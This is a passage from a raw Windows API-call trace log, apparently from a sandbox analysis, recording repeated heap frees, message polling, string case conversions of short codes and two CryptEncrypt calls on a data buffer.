wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.173] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.174] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.174] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.174] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.174] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.174] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.174] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.175] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.175] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.176] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.176] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.176] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.176] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.176] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.176] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.177] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.177] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.177] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.178] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.178] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.178] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.179] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.179] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e38a8 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.183] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x94b9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x94c0) returned 1 [0256.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.183] CharLowerBuffW (in: lpsz="byte[38080]", cchLength=0xb | out: lpsz="byte[38080]") returned 0xb [0256.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.185] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.185] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.185] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.185] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.185] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.185] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e38a8*, pdwDataLen=0x8bef68*=0x94b9, dwBufLen=0x94c0 | out: pbData=0x24e38a8*, pdwDataLen=0x8bef68*=0x94c0) returned 1 [0256.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.187] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.187] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.187] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.188] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.188] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.188] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.188] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.188] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.188] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.188] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, 